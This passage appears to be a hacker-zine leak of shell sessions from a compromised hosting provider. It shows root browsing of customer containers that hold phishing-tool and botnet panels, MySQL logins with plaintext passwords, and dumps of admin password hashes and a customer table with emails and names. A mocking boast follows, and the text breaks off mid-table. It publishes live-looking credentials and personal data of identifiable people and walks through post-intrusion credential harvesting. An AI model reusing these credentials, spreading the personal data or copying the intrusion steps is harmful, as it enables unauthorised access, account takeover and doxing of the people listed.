true.cyberhost.kz true.cyberhost.kz 33 Sep 1 11:12 .bash_logout +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 176 Sep 1 11:12 .bash_profile +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 124 Sep 1 11:12 .bashrc +drwxr-xr-x 2 true.cyberhost.kz true.cyberhost.kz 4096 Sep 1 11:12 kloxoscript +drwxr-xr-x 2 root root 4096 Oct 5 05:02 __processed_stats +lrwxrwxrwx 1 root root 42 Sep 1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/ +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 11 Sep 1 11:12 .qmail +drwxr-xr-x 5 true.cyberhost.kz apache 4096 Oct 4 10:31 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls +Design portokalli wordpress +[root@true true.cyberhost.kz]# cd wordpress/ + +[root@true wordpress]# ls +index.php + +[root@true wordpress]# cat index.php +

Visit CyberNetwork

KLICK HIER!!! + +[root@true wordpress]# # nothing to see here + +[root@true true.cyberhost.kz]# logout + +exited from CT 130 + +# vzctl enter 140 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 140 + +[root@stansecu /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:59) +root pts/0 p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15 (04:06) +root pts/1 p57b10668.dip0.t Sun Oct 9 20:17 - 01:20 (05:02) +root pts/0 193.107.17.30 Sun Oct 9 20:05 - 20:30 (00:24) +root pts/0 193.107.17.30 Sun Oct 9 19:49 - 20:05 (00:16) +root pts/0 193.107.17.30 Fri Sep 30 16:00 - 21:16 (05:16) +stanwww pts/0 193.107.17.30 Fri Sep 30 15:59 - 15:59 (00:00) +reboot system boot 2.6.18-238.9.1.e Thu Aug 11 15:15 (59+20:45) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:44 (01:02) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:32 (01:14) +reboot system boot 2.6.18-238.9.1.e Wed Jul 13 17:11 (27+16:18) +root pts/0 193.107.16.213 Sun Jul 10 19:59 - 23:31 (03:32) +root pts/0 92.241.165.69 Fri Jul 1 11:24 - 18:41 (07:16) +root pts/0 92.241.165.69 Thu Jun 30 15:40 - 19:48 (04:07) +root pts/0 92.241.165.69 Tue Jun 28 18:52 - 18:52 (00:00) +root pts/0 92.241.165.69 Wed Jun 22 06:29 - 07:36 (01:07) +root pts/0 92.241.165.69 Mon Jun 20 07:41 - 08:24 (00:43) +root pts/0 92.241.165.69 Tue Jun 14 16:03 - 16:43 (00:39) +root pts/0 92.241.165.69 Mon Jun 13 11:27 - 18:21 (06:54) +root pts/0 92.241.165.69 Sat Jun 11 05:45 - 22:19 (16:33) +root pts/0 92.241.165.69 Mon May 30 12:58 - 13:01 (00:02) +stanwww pts/0 92.241.165.69 Mon May 30 12:58 - 12:58 (00:00) +root pts/0 92.241.165.69 Fri May 27 09:32 - 16:07 (06:34) +root pts/0 92.241.165.69 Sun May 22 20:22 - 20:22 (00:00) +root pts/0 92.241.165.69 Sat May 21 12:08 - 14:10 (02:02) +root pts/0 92.241.165.69 Wed May 18 16:41 - 21:01 (04:20) +reboot system boot 2.6.18-238.9.1.e Wed May 18 16:08 (55+14:20) +root pts/1 92.241.165.69 Wed May 18 15:50 - down (00:17) +root pts/0 77-20-18-64-dyni Wed May 18 12:23 - down (03:45) +reboot system boot 2.6.18-238.9.1.e Wed May 18 11:45 (04:22) + +wtmp begins Wed May 18 11:45:54 2011 + +[root@stansecu /]# cd /home/ +[root@stansecu home]# ls +admin axfrdns dnscache dnslog httpd kloxo lxadmin lxlabs nouser stanwww tinydns + +[root@stansecu home]# cd stanwww/ + +[root@stansecu stanwww]# ls -la +total 44 +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 . +drwxr-xr-x 13 root root 4096 May 18 15:00 .. +-rw-r--r-- 1 stanwww stanwww 33 May 18 15:00 .bash_logout +-rw-r--r-- 1 stanwww stanwww 176 May 18 15:00 .bash_profile +-rw-r--r-- 1 stanwww stanwww 124 May 18 15:00 .bashrc +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 kloxoscript +drwxr-xr-x 2 stanwww stanwww 4096 May 21 12:33 pass +drwxr-xr-x 3 stanwww stanwww 4096 Aug 7 17:22 phishingtool +drwxr-xr-x 2 root root 4096 Oct 10 03:57 __processed_stats +lrwxrwxrwx 1 root root 37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/ +-rw-r--r-- 1 stanwww stanwww 11 May 18 15:00 .qmail +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in + +[root@stansecu stanwww]# cd stanley.secure-host.in + +[root@stansecu stanley.secure-host.in]# ls -la +total 220 +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 . +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 .. +drwxr-xr-x 2 stanwww stanwww 4096 Jul 10 11:14 bin +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 cgi-bin +drwxr-xr-x 2 stanwww stanwww 4096 Aug 11 2005 images +-rwxr-xr-x 1 stanwww stanwww 1217 May 18 22:32 index.html +drwxr-xr-x 2 stanwww stanwww 4096 Jul 9 18:25 java +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 phishingtool +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 snapbn +-rw-r--r-- 1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll +drwxr-xr-x 7 stanwww stanwww 4096 Sep 30 16:24 umbralo +drwxr-xr-x 9 stanwww stanwww 4096 May 21 12:32 unique + +[root@stansecu public_html]# cd phishingtool/ + +[root@stansecu phishingtool]# ls -la +total 792 +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 . +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 601 Jul 10 11:45 config.php +-rw-r--r-- 1 stanwww stanwww 2121 May 18 20:17 css.css +-rw-r--r-- 1 stanwww stanwww 1973 May 18 20:17 export.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 12 19:53 exports +-rw-r--r-- 1 stanwww stanwww 750121 May 18 20:17 header.gif +-rw-r--r-- 1 stanwww stanwww 490 May 18 20:17 im.php +-rw-r--r-- 1 stanwww stanwww 1639 May 18 20:17 index.php +-rw-r--r-- 1 stanwww stanwww 2230 May 18 20:17 login.php +-rw-r--r-- 1 stanwww stanwww 111 May 18 20:17 logout.php +-rw-r--r-- 1 stanwww stanwww 1590 May 18 20:17 logs.php +drwxr-xr-x 6 stanwww stanwww 4096 Jul 10 11:48 phishing +-rw-r--r-- 1 stanwww stanwww 889 May 18 20:18 private.php + +tansecu phishingtool]# cat config.php + + +root@stansecu phishingtool]# cd .. +[root@stansecu public_html]# cd snapbn/ + +[root@stansecu snapbn]# ls -la +total 48 +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 . +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 4217 Jun 6 18:56 adv_state.php +drwxr-xr-x 5 stanwww stanwww 4096 Jun 6 19:05 backend +-rw-r--r-- 1 stanwww stanwww 2237 Jun 6 18:56 control.php +drwxr-xr-x 2 stanwww stanwww 4096 Oct 9 16:26 frontend +-rw-r--r-- 1 stanwww stanwww 3047 Jun 6 18:56 gate.php +-rw-r--r-- 1 stanwww stanwww 931 Jun 6 18:56 grab_zone.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 6 18:54 images +-rw-r--r-- 1 stanwww stanwww 38 Jun 6 18:56 ip.php +drwxr-xr-x 3 stanwww stanwww 4096 Jun 6 18:56 theme + +[root@stansecu snapbn]# cat backend/settings.inc.php + + +[root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 4094 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| count(*) | ++----------+ +| 2553 | ++----------+ +1 row in set (0.01 sec) + +mysql> SELECT * FROM list_users; ++----+----------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+----------+----------------------------------+-------------+-------+-----+ +| 1 | stan | 37a80cc8fffebfa607292c8814d89473 | 255 | dark | en | +| 2 | youmetoo | 033f706d5832000e32c14ba6453ac415 | 255 | dark | en | ++----+----------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> 2.5k bots ... well +mysql> Ctrl-C -- exit! +Aborted + +[root@stansecu snapbn]# logout + +exited from CT 140 + +# vzctl enter 160 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 160 + +[root@testing /]# cd /home/ + +[root@testing home]# ls -la +total 88 +drwxr-xr-x 22 root root 4096 Sep 23 12:07 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. +drwx------ 3 admin admin 4096 May 21 11:17 admin +drwx------ 2 axfrdns axfrdns 4096 May 21 11:28 axfrdns +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 deluxa +drwx------ 2 dnscache dnscache 4096 May 21 11:28 dnscache +drwx------ 2 dnslog dnslog 4096 May 21 11:28 dnslog +drwxr-xr-x 12 root root 4096 Sep 23 12:07 httpd +drwxr-xr-x 6 root root 4096 May 22 04:07 kloxo +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 lolboter +drwxr-xr-x 3 root root 4096 May 21 11:17 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 21 11:03 lxlabs +drwxr-x--- 5 lyrex apache 4096 Sep 1 03:57 lyrex +drwxr-x--- 5 master apache 4096 Sep 24 03:58 master +drwx------ 2 nouser nogroup 4096 May 21 11:03 nouser +drwxr-x--- 5 pep apache 4096 Jul 5 03:57 pep +drwxr-x--- 6 pure apache 4096 Jul 5 22:32 pure +drwxr-x--- 5 sprueche apache 4096 Jun 26 03:57 sprueche +drwxr-x--- 5 symb apache 4096 Jun 15 03:57 symb +drwxr-x--- 5 time apache 4096 May 22 03:57 time +drwx------ 2 tinydns tinydns 4096 May 21 11:28 tinydns +drwxr-x--- 5 winfuture apache 4096 May 23 03:57 winfuture + +root@testing home]# cd deluxa/ + +[root@testing deluxa]# ls -la +total 36 +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 . +drwxr-xr-x 22 root root 4096 Sep 23 12:07 .. +-rw-r--r-- 1 deluxa deluxa 33 Jun 14 10:46 .bash_logout +-rw-r--r-- 1 deluxa deluxa 176 Jun 14 10:46 .bash_profile +-rw-r--r-- 1 deluxa deluxa 124 Jun 14 10:46 .bashrc +drwxr-xr-x 5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in +drwxr-xr-x 2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript +drwxr-xr-x 2 root root 4096 Jun 15 03:57 __processed_stats +lrwxrwxrwx 1 root root 35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/ +-rw-r--r-- 1 deluxa deluxa 11 Jun 14 10:46 .qmail + +[root@testing deluxa]# cd public_html/ + +[root@testing public_html]# ls +cgi-bin images index.html snapbn + +[root@testing public_html]# cat snapbn/ +adv_state.php backend/ control.php frontend/ gate.php grab_zone.php images/ ip.php theme/ + +[root@testing public_html]# cat snapbn/backend/ +classes/ flags/ GeoIP.dat geoip.inc index.php js.js language/ settings.inc.php settings.inc.php_ system.php + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + + +[root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92 +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 602007 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+--------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+--------+----------------------------------+-------------+-------+-----+ +| 1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 | 255 | dark | en | ++----+--------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 45 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing lolboter]# cd /home/lolboter/public_html/ + +[root@testing public_html]# ls -la +total 28 +drwxrwxrwx 6 lolboter apache 4096 Oct 18 16:50 . +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 .. +drwxrwxrwx 2 lolboter lolboter 4096 Aug 9 11:45 cgi-bin +drwxrwxrwx 2 lolboter lolboter 4096 Aug 11 2005 images +-rwxrwxrwx 1 lolboter lolboter 1213 Aug 9 11:45 index.html +drwxr-xr-x 3 lolboter lolboter 4096 Aug 9 13:06 snapbn +drwxrwxrwx 6 lolboter lolboter 4096 Aug 9 12:55 upload + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e6053eb8d35e02ae40beeeacef203c1a | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 349 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | lyrex | d43a389b900aff13aa56477e7f3618df | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 658 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing home]# logout +exited from CT 160 + +# vzctl enter 240 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 240 + +[root@spike /]# cd /home + +[root@spike home]# ls -la +total 52 +drwxr-xr-x 13 root root 4096 Jun 7 18:11 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. +drwx------ 3 admin admin 4096 May 22 13:38 admin +drwx------ 2 axfrdns axfrdns 4096 May 22 13:51 axfrdns +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 bnet +drwx------ 2 dnscache dnscache 4096 May 22 13:51 dnscache +drwx------ 2 dnslog dnslog 4096 May 22 13:51 dnslog +drwxr-xr-x 3 root root 4096 Jun 7 18:11 httpd +drwxr-xr-x 6 root root 4096 Jun 8 04:07 kloxo +drwxr-xr-x 3 root root 4096 May 22 13:37 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 22 13:23 lxlabs +drwx------ 2 nouser nogroup 4096 May 22 13:23 nouser +drwx------ 2 tinydns tinydns 4096 May 22 13:51 tinydns + +[root@spike home]# cd httpd + +[root@spike httpd]# ls -la +total 16 +drwxr-xr-x 3 root root 4096 Jun 7 18:11 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rwxr-xr-x 1 root root 111 May 22 13:51 nobody.sh +drwxrwxr-x 6 bnet apache 4096 Jun 7 18:11 spike.secure-host.in + +[root@spike httpd]# cd .. + +[root@spike home]# cd bnet + +[root@spike bnet]# ls -la +total 36 +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rw-r--r-- 1 bnet bnet 33 Jun 7 18:11 .bash_logout +-rw-r--r-- 1 bnet bnet 176 Jun 7 18:11 .bash_profile +-rw-r--r-- 1 bnet bnet 124 Jun 7 18:11 .bashrc +drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 kloxoscript +drwxr-xr-x 2 root root 4096 Sep 11 03:57 __processed_stats +lrwxrwxrwx 1 root root 32 Jun 7 18:11 public_html -> /home/bnet/spike.secure-host.in/ +-rw-r--r-- 1 bnet bnet 11 Jun 7 18:11 .qmail +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 spike.secure-host.in + +[root@spike bnet]# cd public_html + +[root@spike public_html]# ls -la +total 24 +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 . +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 .. +drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 cgi-bin +drwxr-xr-x 2 bnet bnet 4096 Aug 11 2005 images +-rwxr-xr-x 1 bnet bnet 1213 Jun 7 18:11 index.html +drwxr-xr-x 6 bnet bnet 4096 Jun 7 19:04 snapbn + +[root@spike public_html]# cat snapbn/backend/settings.inc.php + + +[root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 10731 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e48e13207341b6bffb7fb1622282247b | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 1321 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@spike public_html]# logout +exited from CT 240 + +... + +We could actually post content of the other VMs but, believe us, it's +always the same sort of bullshit. Bot and stealer panels everywhere, +so this would just be a waste of your time ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Secure-Host.in }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ As we already pointed out, we concluded that it +,;' \ /-(.;, ) would be best to crush every single project of + ) / ) / k!LLu with our iron fist of 0day madness. One of + // || the excrements he produces is Secure-Host.in + )_\ )_\ formerly known as Cyberhost.kz where he basically +offers "secure" hosting. Well by now it should be clear that if +somebody like k!LLu talks about "security", he actually has no clue +about that kind of topic. The fact is that he cannot secure his +systems because he really does not know how. We're confident that the +chapter 'k!LLu' can be closed once and for all now, maybe someone even +drew a lesson from it. + +# pwd +/home/hosting + +# ls -la +total 48 +drwxr-x--- 6 hosting www 512 May 16 14:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 17 hosting www 1536 May 16 14:50 cp.secure-host.in +drwxr-xr-x 2 root www 1024 May 16 14:09 ioncube +drwxrwx--- 5 hosting www 512 Aug 19 04:51 secure-host.in +drwxrwx--- 2 hosting www 13312 Oct 16 10:48 temp + +# cd secure-host.in/ + +# ls -laR +total 24 +drwxrwx--- 5 hosting www 512 Aug 19 04:51 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. +drwxr-xr-x 2 root www 512 May 16 20:57 fileup +drwxr-xr-x 2 root www 512 May 20 10:12 imgupload +-rw-r--r-- 1 hosting www 1680 Aug 19 04:52 index.html +drwxr-xr-x 2 root www 512 May 18 21:56 static + +./fileup: +total 912 +drwxr-xr-x 2 root www 512 May 16 20:57 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 324608 May 16 20:58 Snap_SmilingBandit.exe +-rw-r--r-- 1 root www 118784 May 16 20:53 smile.exe + +./imgupload: +total 4232 +drwxr-xr-x 2 root www 512 May 20 10:12 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 2130942 May 20 10:11 samsung.jpg + +./static: +total 120 +drwxr-xr-x 2 root www 512 May 18 21:56 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 57198 May 18 22:08 sechost.png + +# cd .. + +# cd cp.secure-host.in + +# ls -la +total 1296 +drwxrwx--- 17 hosting www 1536 May 16 14:50 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. +-rw-r--r-- 1 root www 3013 May 16 13:31 README.txt +drwxr-xr-x 6 root www 3584 May 16 13:34 admin +-rw-r--r-- 1 root www 430 May 16 13:31 aff.php +-rw-r--r-- 1 root www 15877 May 16 13:31 affiliates.php +-rw-r--r-- 1 root www 11667 May 16 13:31 announcements.php +-rw-r--r-- 1 root www 7513 May 16 13:31 announcementsrss.php +drwxrwxrwx 2 root www 512 May 16 13:36 attachments +-rw-r--r-- 1 root www 6070 May 16 13:31 banned.php +-rw-r--r-- 1 root www 79378 May 16 13:31 cart.php +-rw-r--r-- 1 root www 120326 May 16 13:31 clientarea.php +-rwxrwxrwx 1 root www 281 May 16 14:41 configuration.php +-rw-r--r-- 1 root www 16445 May 16 13:31 configuressl.php +-rw-r--r-- 1 root www 9616 May 16 13:31 contact.php +-rw-r--r-- 1 root www 13871 May 16 13:31 creditcard.php +-rw-r--r-- 1 root www 23654 May 16 13:31 dbconnect.php +-rw-r--r-- 1 root www 15873 May 16 13:31 dl.php +-rw-r--r-- 1 root www 7938 May 16 13:31 dologin.php +-rw-r--r-- 1 root www 11861 May 16 13:31 domainchecker.php +drwxrwxrwx 2 root www 512 May 16 13:36 downloads +-rw-r--r-- 1 root www 17697 May 16 13:31 downloads.php +-rw-r--r-- 1 root www 621 May 16 13:31 htaccess.txt +drwxr-xr-x 2 root www 1536 May 16 13:37 images +drwxr-xr-x 7 root www 1536 May 16 13:38 includes +-rw-r--r-- 1 root www 6192 May 16 13:31 index.php +drwxr-xr-x 2 root www 1024 May 16 13:39 install__ +drwxr-xr-x 2 root www 1024 May 16 14:11 ioncube +-rw-r--r-- 1 root www 26163 May 16 13:31 knowledgebase.php +drwxr-xr-x 2 root www 512 May 16 13:39 lang +-rw-r--r-- 1 root www 4660 May 16 13:31 link.php +-rw-r--r-- 1 root www 4433 May 16 13:31 login.php +-rw-r--r-- 1 root www 5146 May 16 13:31 logout.php +drwxr-xr-x 10 root www 512 May 16 13:42 modules +-rw-r--r-- 1 root www 11456 May 16 13:31 networkissues.php +-rw-r--r-- 1 root www 6321 May 16 13:31 networkissuesrss.php +drwxr-xr-x 4 root www 512 May 16 13:43 order +-rw-r--r-- 1 root www 4271 May 16 13:31 order.php +drwxr-xr-x 2 root www 512 May 16 13:43 pipe +-rw-r--r-- 1 root www 10548 May 16 13:31 pwreset.php +-rw-r--r-- 1 root www 9061 May 16 13:31 register.php +-rw-r--r-- 1 root www 8575 May 16 13:31 serverstatus.php +drwxr-xr-x 2 root www 512 May 16 13:43 status +-rw-r--r-- 1 root www 17879 May 16 13:31 submitticket.php +-rw-r--r-- 1 root www 12639 May 16 13:31 supporttickets.php +drwxr-xr-x 5 root www 512 May 16 13:32 templates +drwxrwxrwx 2 root www 25088 Aug 11 15:05 templates_c +-rw-r--r-- 1 root www 5953 May 16 13:31 tutorials.php +-rw-r--r-- 1 root www 20858 May 16 13:31 upgrade.php +-rw-r--r-- 1 root www 5924 May 16 13:31 viewemail.php +-rw-r--r-- 1 root www 20202 May 16 13:31 viewinvoice.php +-rw-r--r-- 1 root www 17742 May 16 13:31 viewticket.php +-rw-r--r-- 1 root www 6111 May 16 13:31 whois.php +drwxr-xr-x 2 root www 512 May 16 13:33 widgets + +# cat configuration.php + + +# mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 1305663 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_hosting_whmcs | ++----------------------------+ +| tblaccounts | +| tblactivitylog | +| tbladdonmodules | +| tbladdons | +| tbladminlog | +| tbladminperms | +| tbladminroles | +| tbladmins | +| tbladminsecurityquestions | +| tblaffiliates | +| tblaffiliatesaccounts | +| tblaffiliateshistory | +| tblaffiliatespending | +| tblaffiliateswithdrawals | +| tblannouncements | +| tblbannedemails | +| tblbannedips | +| tblbillableitems | +| tblbrowserlinks | +| tblcalendar | +| tblcancelrequests | +| tblclientgroups | +| tblclients | +| tblclientsfiles | +| tblconfiguration | +| tblcontacts | +| tblcredit | +| tblcurrencies | +| tblcustomfields | +| tblcustomfieldsvalues | +| tbldomainpricing | +| tbldomains | +| tbldomainsadditionalfields | +| tbldownloadcats | +| tbldownloads | +| tblemails | +| tblemailtemplates | +| tblfraud | +| tblgatewaylog | +| tblhosting | +| tblhostingaddons | +| tblhostingconfigoptions | +| tblinvoiceitems | +| tblinvoices | +| tblknowledgebase | +| tblknowledgebasecats | +| tblknowledgebaselinks | +| tbllinks | +| tblnetworkissues | +| tblnotes | +| tblorders | +| tblpaymentgateways | +| tblpricing | +| tblproductconfiggroups | +| tblproductconfiglinks | +| tblproductconfigoptions | +| tblproductconfigoptionssub | +| tblproductgroups | +| tblproducts | +| tblpromotions | +| tblquoteitems | +| tblquotes | +| tblregistrars | +| tblservergroups | +| tblservergroupsrel | +| tblservers | +| tblsslorders | +| tbltax | +| tblticketbreaklines | +| tblticketdepartments | +| tblticketescalations | +| tblticketlog | +| tblticketmaillog | +| tblticketnotes | +| tblticketpredefinedcats | +| tblticketpredefinedreplies | +| tblticketreplies | +| tbltickets | +| tblticketspamfilters | +| tblticketstatuses | +| tbltodolist | +| tblupgrades | +| tblwhoislog | ++----------------------------+ +83 rows in set (0.00 sec) + +mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name LIKE "%pass%"; ++----------------------+ +| table_name | ++----------------------+ +| tbladmins | +| tblclients | +| tblcontacts | +| tblhosting | +| tblservers | +| tblticketdepartments | ++----------------------+ +6 rows in set (0.04 sec) + +mysql> SELECT username, password, firstname, lastname, email FROM tbladmins; ++----------+----------------------------------+-----------+----------+----------------------+ +| username | password | firstname | lastname | email | ++----------+----------------------------------+-----------+----------+----------------------+ +| admin | 850126ac86ccbb1c214a03ac909978aa | Sombra | Ivanov | admin@secure-host.in | +| Olga | 61d4019c541bf1cebf5a2a6762cd6477 | Olga | Ivanov | olga@secure-host.in | ++----------+----------------------------------+-----------+----------+----------------------+ +2 rows in set (0.00 sec) + +mysql> SELECT email, password, firstname, lastname FROM tblclients; ++----------------------------+----------------------------------------+-----------+-----------+ +| email | password | firstname | lastname | ++----------------------------+----------------------------------------+-----------+-----------+ +| cc1cash@yahoo.de | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True | True | +| wassi@wassi.de | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi | wassi | +| markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling | Bandit | +| stan.lay@hotmail.com | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay | stanlay | +| a@a.de | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa | faka | +| Worms.s1@web.de | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script | Star | +| cocktopuss@hush.com | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean | Fakir | +| los_loco@mail.ru | cddfbab06c60175699ff61f8cd27630e:%UKzg | los | loco | +| hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans | dieter | +| shinigami@z1p.biz | 914eccd87181870be2663185410fc1a5:WpFO( | Franz | Mueller | +| angela.krueger@hotmail.de | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde | ahmed | +| her0in@safe-mail.net | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym | Anonym | +| janioq@hotmail.de | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max | thiesen | +| spike1337@secure-mail.biz | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis | Kramer | +| runingtutorials@live.de | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix | Wagno | +| abogado.gomes@ozu.es | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario | Gomes | +| Ande-kf@secure-mail.biz | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just | pure | +| FeuerFaustAC3@gmx.de | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0 | ACE | +| lalamaus10@googlemail.com | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik | Henkel | +| scheller0077@web.de | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim | bd-seller | +| j4ck-daniels@rambler.ru | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide | Darker | +| daniel@lemmert.biz | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel | Lemmert | +| panzerpaul41@yahoo.de | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter | Jansen | +| ell781@gmx.de | 0ae341662b701d3d64d7a608b46160be:%#ce! | Peter | Kluger | +| hotstore@hotmail.de | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias | Michel | +| team61@live.de | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA | ANNA | +| Buy321@hotmail.de | 